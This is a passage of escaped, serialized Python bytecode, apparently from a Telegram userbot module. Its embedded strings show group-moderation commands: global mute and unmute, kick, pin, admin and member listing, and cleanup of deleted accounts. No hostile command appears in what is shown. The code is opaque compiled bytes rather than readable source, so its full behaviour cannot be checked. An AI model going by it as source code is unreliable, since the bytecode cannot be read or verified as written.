1\x01\x00d\x01d\x03l\x02m\x03}\x02\x01\x00W\x00n\x16\x04\x00t\x04k\nr2\x01\x00\x01\x00\x01\x00Y\x00d\x04S\x00X\x00|\x01|\x00j\x05\x83\x01}\x03|\x02|\x00j\x06\x83\x01}\x04t\x07d\x04d\x05d\x05d\x05d\x05d\x05d\x05d\x05d\x06\x8d\x08}\x05|\x03r\xac|\x03D\x00]B}\x06t\x08|\x06j\t\x83\x01t\x08|\x00j\x06\x83\x01k\x02rh|\x00\xa0\n\xa1\x00I\x00d\x04H\x00\x01\x00|\x00\xa0\x0bt\x0c|\x00j\x05|\x00j\x06|\x05\x83\x03\xa1\x01I\x00d\x04H\x00\x01\x00qh|\x04D\x00]"}\x06|\x06j\tt\x08|\x00j\x06\x83\x01k\x02r\xb0|\x00\xa0\n\xa1\x00I\x00d\x04H\x00\x01\x00q\xb0d\x04S\x00)\x07z0 Used for deleting the messages of muted people r\x01\x00\x00\x00)\x01\xda\x08is_muted)\x01\xda\tis_gmutedNTr)\x00\x00\x00)\rr_\x00\x00\x00rf\x00\x00\x00\xda$userbot.modules.sql_helper.gmute_sqlrg\x00\x00\x00r`\x00\x00\x00r:\x00\x00\x00Z\tsender_idr\x15\x00\x00\x00rX\x00\x00\x00Z\x06senderrW\x00\x00\x00r6\x00\x00\x00r\x0f\x00\x00\x00)\x07Z\x04mootrf\x00\x00\x00rg\x00\x00\x00Z\x05mutedZ\x06gmutedZ\x06rights\xda\x01ir@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x05muter\x9f\x01\x00\x00s6\x00\x00\x00\x00\x03\x02\x01\x0c\x01\x10\x01\x0e\x01\x08\x01\n\x01\n\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf8\x06\n\x04\x01\x08\x01\x14\x01\x0e\x01\x04\x01\x0e\xff\x0c\x02\x08\x01\x10\x01rj\x00\x00\x00z\x14^.ungmute(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\x10\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00z\x10d\x02d\x03l\x05m\x06}\x04\x01\x00W\x00n&\x04\x00t\x07k\nrl\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x08\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00t\t|\x00\x83\x01I\x00d\x01H\x00}\x05|\x05d\x02\x19\x00}\x05|\x05r\x8an\x04d\x01S\x00|\x00\xa0\x03d\x04\xa1\x01I\x00d\x01H\x00\x01\x00|\x04|\x05j\n\x83\x01d\x05k\x08r\xbe|\x00\xa0\x03d\x06\xa1\x01I\x00d\x01H\x00\x01\x00nN|\x00\xa0\x03d\x07\xa1\x01I\x00d\x01H\x00\x01\x00t\x0b\x90\x01r\x0c|\x00j\x0c\xa0\rt\x0ed\x08|\x05j\x0f\x9b\x00d\t|\x05j\n\x9b\x00d\n|\x00j\x10j\x11\x9b\x00d\x0b|\x00j\x12\x9b\x00d\x0c\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\rz: For .ungmute command, ungmutes the target in the userbot Nr\x01\x00\x00\x00)\x01\xda\x07ungmutez\x12```Ungmuting...```Fz"`Error! User probably not gmuted.`z\x1b```Ungmuted Successfully```z\x10#UNGMUTE\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00)\x13r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rh\x00\x00\x00rk\x00\x00\x00r`\x00\x00\x00ra\x00\x00\x00rK\x00\x00\x00rL\x00\x00\x00r\x19\x00\x00\x00r6\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00r:\x00\x00\x00)\x06Z\x08un_gmuter>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rk\x00\x00\x00rQ\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x07ungmoot\xbe\x01\x00\x00s2\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x03\x02\x01\x10\x01\x0e\x01\x10\x01\x08\x02\x0e\x01\x08\x01\x04\x01\x02\x02\x04\x03\x10\x02\x0e\x01\x12\x03\x10\x02\x06\x01\x06\x01\x02\x00&\xffrl\x00\x00\x00z\x12^.gmute(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s(\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00z\x10d\x02d\x03l\x05m\x06}\x04\x01\x00W\x00n&\x04\x00t\x07k\nrl\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x08\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00t\t|\x00\x83\x01I\x00d\x01H\x00\\\x02}\x05}\x06|\x05r\x86n\x04d\x01S\x00|\x00\xa0\x03d\x04\xa1\x01I\x00d\x01H\x00\x01\x00|\x04|\x05j\n\x83\x01d\x05k\x08r\xba|\x00\xa0\x03d\x06\xa1\x01I\x00d\x01H\x00\x01\x00nj|\x06r\xd6|\x00\xa0\x03d\x07|\x06\x9b\x00\x9d\x02\xa1\x01I\x00d\x01H\x00\x01\x00n\x10|\x00\xa0\x03d\x08\xa1\x01I\x00d\x01H\x00\x01\x00t\x0b\x90\x01r$|\x00j\x0c\xa0\rt\x0ed\t|\x05j\x0f\x9b\x00d\n|\x05j\n\x9b\x00d\x0b|\x00j\x10j\x11\x9b\x00d\x0c|\x00j\x12\x9b\x00d\r\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0ez> For .gmute command, globally mutes the replied/tagged person Nr\x01\x00\x00\x00)\x01\xda\x05gmutez\x13`Prosses Ngemute..`Fz9`Error! User probably already gmuted.\nRe-rolls the tape.`z\x1f`Berhasil di G Emute!!`Reason: z\x17`Berhasil di G Emute!!`z\x0e#GMUTE\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00)\x13r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rh\x00\x00\x00rm\x00\x00\x00r`\x00\x00\x00ra\x00\x00\x00rK\x00\x00\x00rL\x00\x00\x00r\x19\x00\x00\x00r6\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00r:\x00\x00\x00)\x07Z\x05gspdrr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rm\x00\x00\x00rQ\x00\x00\x00rY\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x07gspider\xe9\x01\x00\x00s8\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x03\x02\x01\x10\x01\x0e\x01\x10\x01\x08\x02\x12\x01\x04\x01\x02\x02\x04\x03\x10\x01\x0e\x01\x04\x01\x02\xff\x0c\x03\x04\x01\x18\x02\x10\x02\x06\x01\x06\x01\x02\x00&\xffrn\x00\x00\x00z\x14^.zombies(?: |$)(.*))\x03r*\x00\x00\x00r+\x00\x00\x00Z\x0bgroups_onlyc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s.\x02\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02\xa1\x00}\x01d\x02}\x02d\x03}\x03|\x01d\x04k\x03r\x92|\x00\xa0\x03d\x05\xa1\x01I\x00d\x06H\x00\x01\x00|\x00j\x04\xa0\x05|\x00j\x06\xa1\x012\x00z(3\x00d\x06H\x00W\x00}\x04|\x04j\x07r>|\x02d\x017\x00}\x02t\x08d\x01\x83\x01I\x00d\x06H\x00\x01\x00q>6\x00|\x02d\x02k\x04r~d\x07|\x02\x9b\x00d\x08\x9d\x03}\x03|\x00\xa0\x03|\x03\xa1\x01I\x00d\x06H\x00\x01\x00d\x06S\x00|\x00\xa0\t\xa1\x00I\x00d\x06H\x00}\x05|\x05j\n}\x06|\x05j\x0b}\x07|\x06s\xc8|\x07s\xc8|\x00\xa0\x03d\t\xa1\x01I\x00d\x06H\x00\x01\x00d\x06S\x00|\x00\xa0\x03d\n\xa1\x01I\x00d\x06H\x00\x01\x00d\x02}\x02d\x02}\x08|\x00j\x04\xa0\x05|\x00j\x06\xa1\x012\x00z\xa63\x00d\x06H\x00W\x00}\x04|\x04j\x07r\xeez |\x00\xa0\x04t\x0c|\x00j\x06|\x04j\rt\x0e\x83\x03\xa1\x01I\x00d\x06H\x00\x01\x00W\x00nN\x04\x00t\x0fk\n\x90\x01rJ\x01\x00\x01\x00\x01\x00|\x00\xa0\x03d\x0b\xa1\x01I\x00d\x06H\x00\x01\x00Y\x00\x01\x00d\x06S\x00\x04\x00t\x10k\n\x90\x01rn\x01\x00\x01\x00\x01\x00|\x02d\x018\x00}\x02|\x08d\x017\x00}\x08Y\x00n\x02X\x00|\x00\xa0\x04t\x0c|\x00j\x06|\x04j\rt\x11\x83\x03\xa1\x01I\x00d\x06H\x00\x01\x00|\x02d\x017\x00}\x02q\xee6\x00|\x02d\x02k\x04\x90\x01r\xaed\x0c|\x02\x9b\x00d\r\x9d\x03}\x03|\x08d\x02k\x04\x90\x01r\xcad\x0c|\x02\x9b\x00d\x0e|\x08\x9b\x00d\x0f\x9d\x05}\x03|\x00\xa0\x03|\x03\xa1\x01I\x00d\x06H\x00\x01\x00t\x08d\x10\x83\x01I\x00d\x06H\x00\x01\x00|\x00\xa0\x12\xa1\x00I\x00d\x06H\x00\x01\x00t\x13\x90\x02r*|\x00j\x04\xa0\x14t\x15d\x11|\x02\x9b\x00d\x12|\x00j\x16j\x17\x9b\x00d\x13|\x00j\x06\x9b\x00d\x14\x9d\x07\xa1\x02I\x00d\x06H\x00\x01\x00d\x06S\x00)\x15zM For .zombies command, list all the ghost/deleted/zombie accounts in a chat. \xe9\x01\x00\x00\x00r\x01\x00\x00\x00z+`No deleted accounts found, Group is clean`Z\x05cleanz0`Searching for ghost/deleted/zombie accounts...`Nz\n`Found` **zb** `ghost/deleted/zombie account(s) in this group, \nclean them by using .zombies clean`z\x19`I am not an admin here!`z3`Deleting deleted accounts...\nOh I can do that?!?!`z\'`I don\'t have ban rights in this group`z\nCleaned **z\x15** deleted account(s)z!** deleted account(s) \n**z)** deleted admin accounts are not removed\xe9\x02\x00\x00\x00z\x13#CLEANUP\nCleaned **z+** deleted account(s) !! \nCHAT: rI\x00\x00\x00rJ\x00\x00\x00)\x18\xda\rpattern_match\xda\x05group\xda\x05lowerr.\x00\x00\x00r6\x00\x00\x00\xda\x11iter_participantsr:\x00\x00\x00\xda\x07deletedr\x02\x00\x00\x00r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r\x0f\x00\x00\x00rL\x00\x00\x00rV\x00\x00\x00r\x08\x00\x00\x00r\x0b\x00\x00\x00r\\\x00\x00\x00rW\x00\x00\x00r\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00)\t\xda\x04showZ\x03conZ\x05del_uZ\ndel_statusrQ\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00Z\x05del_ar@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\rrm_deletedacc\x15\x02\x00\x00sh\x00\x00\x00\x00\x04\x10\x01\x04\x01\x04\x02\x08\x01\x10\x01\x1a\x02\x06\x01\x08\x01\x12\x01\x08\x01\x0c\x02\x10\x01\x04\x03\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x10\x01\x04\x01\x04\x02\x1a\x01\x06\x01\x02\x01\x04\x01\x0e\xff\x0e\x02\x10\x01\x10\x01\x08\x01\x10\x01\x08\x01\x0e\x01\x04\x01\x0e\xff\n\x02\x0c\x03\n\x01\x0c\x02\n\x01\x08\x01\x02\xff\x08\x04\x10\x01\x0e\x01\x0e\x03\x06\x01\x06\x01\x02\x00\x1c\xffrw\x00\x00\x00z\t^.admins$c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s\xf8\x00\x00\x00|\x00j\x00\xa0\x01|\x00j\x02\xa1\x01I\x00d\x01H\x00}\x01|\x01j\x03r |\x01j\x03n\x02d\x02}\x02d\x03|\x02\x9b\x00d\x04\x9d\x03}\x03zx|\x00j\x00j\x04|\x00j\x02t\x05d\x05\x8d\x022\x00z^3\x00d\x01H\x00W\x00}\x04|\x04j\x06s\x90d\x06|\x04j\x07\x9b\x00d\x07|\x04j\x08\x9b\x00d\x08\x9d\x05}\x05d\t|\x04j\x07\x9b\x00d\n\x9d\x03}\x06|\x03d\x0b|\x05\x9b\x00d\x0c|\x06\x9b\x00\x9d\x047\x00}\x03qD|\x03d\r|\x04j\x07\x9b\x00d\n\x9d\x037\x00}\x03qD6\x00W\x00n6\x04\x00t\tk\nr\xde\x01\x00}\x07\x01\x00z\x18|\x03d\x0ct\n|\x07\x83\x01\x17\x00d\x0b\x17\x007\x00}\x03W\x005\x00d\x01}\x07~\x07X\x00Y\x00n\x02X\x00|\x00j\x0b|\x03d\x0ed\x0f\x8d\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x10z: For .admins command, list all of the admins of the chat. N\xfa\tthis chatz\r<b>Admins in z\x07:</b> \n)\x01\xda\x06filterz\x16<a href="tg://user?id=z\x02">z\x04</a>z\x06<code>z\x07</code>\xda\x01\n\xfa\x01 z\x17\nDeleted Account <code>\xda\x04html\xa9\x01Z\nparse_mode)\x0cr6\x00\x00\x00\xda\nget_entityr:\x00\x00\x00rP\x00\x00\x00rt\x00\x00\x00r\x13\x00\x00\x00ru\x00\x00\x00rL\x00\x00\x00rO\x00\x00\x00r\x08\x00\x00\x00rX\x00\x00\x00r.\x00\x00\x00)\x08rv\x00\x00\x00\xda\x04inforP\x00\x00\x00\xda\x08mentionsrQ\x00\x00\x00Z\x04linkZ\x06userid\xda\x03errr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\tget_admin]\x02\x00\x00s \x00\x00\x00\x00\x03\x14\x01\x10\x01\x0c\x01\x02\x01\x06\x01\x04\x00\x02\xff\x12\x02\x06\x01\x16\x01\x0e\x01\x16\x02\x1a\x01\x10\x01&\x01r\x82\x00\x00\x00z\x10^.pin(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\r\x00\x00\x00\xc3\x00\x00\x00s$\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x00j\x05}\x04|\x04sT|\x00\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x00j\x06\xa0\x07d\x03\xa1\x01}\x05d\x04}\x06|\x05\xa0\x08\xa1\x00d\x05k\x02rtd\x06}\x06z\x1e|\x00\xa0\tt\n|\x00j\x0b|\x04|\x06\x83\x03\xa1\x01I\x00d\x01H\x00\x01\x00W\x00n&\x04\x00t\x0ck\nr\xb8\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\r\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00|\x00\xa0\x03d\x07\xa1\x01I\x00d\x01H\x00\x01\x00t\x0e|\x00j\x0f|\x00\x83\x02I\x00d\x01H\x00}\x07t\x10\x90\x01r |\x00j\t\xa0\x11t\x12d\x08|\x07j\x13\x9b\x00d\t|\x07j\x14\x9b\x00d\n|\x00j\x15j\x16\x9b\x00d\x0b|\x00j\x17\x9b\x00d\x0c|\x06\x0c\x00\x9b\x00\x9d\n\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\rzH For .pin command, pins the replied/tagged message on the top the chat. Nz\x1f`Reply to a message to pin it.`ro\x00\x00\x00TZ\x04loudFz\x10`Pesan di Pin!!`z\r#PIN\nADMIN: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00z\t`)\nLOUD: )\x18r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00\xda\x0freply_to_msg_idrq\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00r6\x00\x00\x00r\x11\x00\x00\x00Z\x05to_idr\x07\x00\x00\x00rM\x00\x00\x00\xda\x10get_user_from_id\xda\x07from_idr\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00rL\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00r:\x00\x00\x00)\x08\xda\x03msgr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00Z\x06to_pinZ\x07optionsZ\tis_silentrQ\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x03pinq\x02\x00\x00s8\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x06\x02\x04\x01\x10\x01\x04\x02\x0c\x02\x04\x02\x0c\x01\x04\x02\x02\x01\x04\x01\x0c\xff\x0e\x02\x0e\x01\x10\x01\x08\x02\x10\x02\x12\x02\x06\x01\x06\x01\x02\x00,\xffr\x87\x00\x00\x00z\x11^.kick(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00st\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00t\x05|\x00\x83\x01I\x00d\x01H\x00\\\x02}\x04}\x05|\x04s`|\x00\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x00\xa0\x03d\x03\xa1\x01I\x00d\x01H\x00\x01\x00z*|\x00j\x06\xa0\x07|\x00j\x08|\x04j\t\xa1\x02I\x00d\x01H\x00\x01\x00t\nd\x04\x83\x01I\x00d\x01H\x00\x01\x00W\x00nF\x04\x00t\x0bk\nr\xe0\x01\x00}\x06\x01\x00z(|\x00\xa0\x03t\x0cd\x05t\r|\x06\x83\x01\x9b\x00\x9d\x02\x17\x00\xa1\x01I\x00d\x01H\x00\x01\x00W\x00Y\x00\xa2\x04d\x01S\x00d\x01}\x06~\x06X\x00Y\x00n\x02X\x00|\x05\x90\x01r\x10|\x00\xa0\x03d\x06|\x04j\x0e\x9b\x00d\x07|\x04j\t\x9b\x00d\x08|\x05\x9b\x00\x9d\x06\xa1\x01I\x00d\x01H\x00\x01\x00n"|\x00\xa0\x03d\x06|\x04j\x0e\x9b\x00d\x07|\x04j\t\x9b\x00d\t\x9d\x05\xa1\x01I\x00d\x01H\x00\x01\x00t\x0f\x90\x01rp|\x00j\x06\xa0\x10t\x11d\n|\x04j\x0e\x9b\x00d\x07|\x04j\t\x9b\x00d\x0b|\x00j\x12j\x13\x9b\x00d\x0c|\x00j\x08\x9b\x00d\r\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0ezD For .kick command, kicks the replied/tagged person from the group. Nz\x16`Couldn\'t fetch user.`z\x0c`Kicking...`g\x00\x00\x00\x00\x00\x00\xe0?rz\x00\x00\x00z\x10`di Tendang!!` [rG\x00\x00\x00z\r)`!`\nReason: z\x04)`!`z\r#KICK\nUSER: [rH\x00\x00\x00rI\x00\x00\x00z\x03`)\n)\x14r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00r6\x00\x00\x00\xda\x10kick_participantr:\x00\x00\x00rL\x00\x00\x00r\x02\x00\x00\x00\xda\tExceptionrM\x00\x00\x00rX\x00\x00\x00rO\x00\x00\x00r\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00)\x07Z\x03usrr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rQ\x00\x00\x00rY\x00\x00\x00\xda\x01er@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x04kick\x9e\x02\x00\x00s:\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x12\x01\x04\x01\x10\x01\x04\x02\x10\x02\x02\x01\x18\x01\x12\x01\x10\x01\x1e\x01\x18\x02\x06\x01\x04\x01\x18\xff\x0c\x04\x04\x01\x14\xff\n\x03\x06\x01\x06\x01\x02\x00&\xffr\x8b\x00\x00\x00z\r^.users ?(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s\xc8\x01\x00\x00|\x00j\x00\xa0\x01|\x00j\x02\xa1\x01I\x00d\x01H\x00}\x01|\x01j\x03r |\x01j\x03n\x02d\x02}\x02d\x03\xa0\x04|\x02\xa1\x01}\x03z\xd8|\x00j\x05\xa0\x06d\x04\xa1\x01s\x98|\x00j\x00\xa0\x07|\x00j\x02\xa1\x012\x00zH3\x00d\x01H\x00W\x00}\x04|\x04j\x08s\x80|\x03d\x05|\x04j\t\x9b\x00d\x06|\x04j\n\x9b\x00d\x07|\x04j\n\x9b\x00d\x08\x9d\x077\x00}\x03qJ|\x03d\t|\x04j\n\x9b\x00d\x08\x9d\x037\x00}\x03qJ6\x00nl|\x00j\x05\xa0\x06d\x04\xa1\x01}\x05|\x00j\x00j\x07|\x00j\x02|\x05\x9b\x00d\n\x8d\x022\x00zH3\x00d\x01H\x00W\x00}\x04|\x04j\x08s\xee|\x03d\x05|\x04j\t\x9b\x00d\x06|\x04j\n\x9b\x00d\x07|\x04j\n\x9b\x00d\x08\x9d\x077\x00}\x03q\xb8|\x03d\t|\x04j\n\x9b\x00d\x08\x9d\x037\x00}\x03q\xb86\x00W\x00n8\x04\x00t\x0bk\n\x90\x01r>\x01\x00}\x06\x01\x00z\x18|\x03d\x0bt\x0c|\x06\x83\x01\x17\x00d\x0c\x17\x007\x00}\x03W\x005\x00d\x01}\x06~\x06X\x00Y\x00n\x02X\x00z\x14|\x00\xa0\r|\x03\xa1\x01I\x00d\x01H\x00\x01\x00W\x00nn\x04\x00t\x0ek\n\x90\x01r\xc2\x01\x00\x01\x00\x01\x00|\x00\xa0\rd\r\xa1\x01I\x00d\x01H\x00\x01\x00t\x0fd\x0ed\x0f\x83\x02}\x07|\x07\xa0\x10|\x03\xa1\x01\x01\x00|\x07\xa0\x11\xa1\x00\x01\x00|\x00j\x00j\x12|\x00j\x02d\x0ed\x10\xa0\x04|\x02\xa1\x01|\x00j\nd\x11\x8d\x04I\x00d\x01H\x00\x01\x00t\x13d\x0e\x83\x01\x01\x00Y\x00n\x02X\x00d\x01S\x00)\x12z6 For .users command, list all of the users in a chat. Nrx\x00\x00\x00z\x15List Anggota di {}: \nro\x00\x00\x00\xfa\x02\n[rG\x00\x00\x00\xfa\x03) `rU\x00\x00\x00z\x12\nDeleted Account `\xa9\x01\xda\x06searchr{\x00\x00\x00rz\x00\x00\x00z:Damn, this is a huge group. Uploading users lists as file.\xfa\ruserslist.txt\xfa\x02w+\xfa\x0bUsers in {}\xa9\x02Z\x07captionZ\x08reply_to\xa9\x14r6\x00\x00\x00r~\x00\x00\x00r:\x00\x00\x00rP\x00\x00\x00\xda\x06formatrq\x00\x00\x00rr\x00\x00\x00rt\x00\x00\x00ru\x00\x00\x00rO\x00\x00\x00rL\x00\x00\x00r\x08\x00\x00\x00rX\x00\x00\x00r.\x00\x00\x00r\r\x00\x00\x00\xda\x04open\xda\x05write\xda\x05closeZ\tsend_filer\x03\x00\x00\x00\xa9\x08rv\x00\x00\x00r\x7f\x00\x00\x00rP\x00\x00\x00r\x80\x00\x00\x00rQ\x00\x00\x00Z\x07searchqr\x81\x00\x00\x00\xda\x04filer@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\tget_users\xc8\x02\x00\x00sF\x00\x00\x00\x00\x03\x14\x01\x10\x01\n\x01\x02\x01\x0c\x01\x1a\x01\x06\x01$\x02\x18\x02\x0c\x01\x06\x01\x04\x00\x04\xff\x12\x02\x06\x01$\x02\x1a\x01\x12\x01&\x01\x02\x01\x14\x01\x10\x01\x04\x01\x02\xff\n\x02\n\x01\n\x01\x08\x01\x06\x01\x04\x01\x02\x01\x08\x01\x04\xfc\x0c\x06r\x9b\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00sD\x01\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02d\x02d\x01\xa1\x02}\x01d\x03}\x02|\x00j\x03rZt\x04|\x01\x83\x01d\x04k\x02sZ|\x00\xa0\x05\xa1\x00I\x00d\x03H\x00}\x03|\x00j\x06\xa0\x07|\x03j\x08\xa1\x01I\x00d\x03H\x00}\x04|\x00j\x00\xa0\x01d\x01\xa1\x01}\x02n\xe2|\x01\x90\x01r<|\x01d\x05\x19\x00}\x05t\x04|\x01\x83\x01d\x04k\x02r||\x01d\x01\x19\x00}\x02|\x05\xa0\t\xa1\x00r\x8ct\n|\x05\x83\x01}\x05|\x05s\xa4|\x00\xa0\x0bd\x06\xa1\x01I\x00d\x03H\x00\x01\x00d\x03S\x00|\x00j\x0cj\rd\x03k\tr\xe2|\x00j\x0cj\rd\x05\x19\x00}\x06t\x0e|\x06t\x0f\x83\x02r\xe2|\x06j\x10}\x07|\x00j\x06\xa0\x07|\x07\xa1\x01I\x00d\x03H\x00}\x04|\x04S\x00z\x16|\x00j\x06\xa0\x07|\x05\xa1\x01I\x00d\x03H\x00}\x04W\x00nB\x04\x00t\x11t\x12f\x02k\n\x90\x01r:\x01\x00}\x08\x01\x00z\x1e|\x00\xa0\x0bt\x13|\x08\x83\x01\xa1\x01I\x00d\x03H\x00\x01\x00W\x00Y\x00\xa2\x04d\x03S\x00d\x03}\x08~\x08X\x00Y\x00n\x02X\x00|\x04|\x02f\x02S\x00)\x07z0 Get the user from argument or replied message. ro\x00\x00\x00r{\x00\x00\x00Nrp\x00\x00\x00r\x01\x00\x00\x00z(`Pass the user\'s username, id or reply!`\xa9\x14rq\x00\x00\x00rr\x00\x00\x00r8\x00\x00\x00r\x83\x00\x00\x00\xda\x03lenr/\x00\x00\x00r6\x00\x00\x00r~\x00\x00\x00r\x85\x00\x00\x00\xda\tisnumeric\xda\x03intr.\x00\x00\x00r,\x00\x00\x00Z\x08entitiesr5\x00\x00\x00r\x16\x00\x00\x00\xda\x07user_id\xda\tTypeError\xda\nValueErrorrX\x00\x00\x00\xa9\t\xda\x05event\xda\x04argsZ\x05extraZ\x10previous_message\xda\x08user_objrQ\x00\x00\x00Z\x1cprobable_user_mention_entityr\xa0\x00\x00\x00r\x81\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00rK\x00\x00\x00\xf0\x02\x00\x00s:\x00\x00\x00\x00\x02\x14\x01\x04\x01\x12\x01\x0e\x01\x14\x01\x0e\x01\x06\x01\x08\x01\x0c\x01\x08\x02\x08\x01\x08\x02\x04\x01\x10\x01\x04\x02\x0c\x01\x0c\x02\x04\x01\x02\xff\x04\x02\x06\x01\x12\x01\x04\x01\x02\x01\x16\x01\x16\x01\x14\x01\x18\x02rK\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00sn\x00\x00\x00t\x00|\x00t\x01\x83\x02r\x12t\x02|\x00\x83\x01}\x00z\x16|\x01j\x03\xa0\x04|\x00\xa1\x01I\x00d\x00H\x00}\x02W\x00n@\x04\x00t\x05t\x06f\x02k\nrh\x01\x00}\x03\x01\x00z\x1e|\x01\xa0\x07t\x01|\x03\x83\x01\xa1\x01I\x00d\x00H\x00\x01\x00W\x00Y\x00\xa2\x04d\x00S\x00d\x00}\x03~\x03X\x00Y\x00n\x02X\x00|\x02S\x00\xa9\x01N\xa9\x08r5\x00\x00\x00rX\x00\x00\x00r\x9f\x00\x00\x00r6\x00\x00\x00r~\x00\x00\x00r\xa1\x00\x00\x00r\xa2\x00\x00\x00r.\x00\x00\x00\xa9\x04rQ\x00\x00\x00r\xa4\x00\x00\x00r\xa6\x00\x00\x00r\x81\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\x84\x00\x00\x00\x15\x03\x00\x00s\x10\x00\x00\x00\x00\x01\n\x01\x08\x02\x02\x01\x16\x01\x14\x01\x14\x01\x18\x02r\x84\x00\x00\x00z\x10^.usersdel 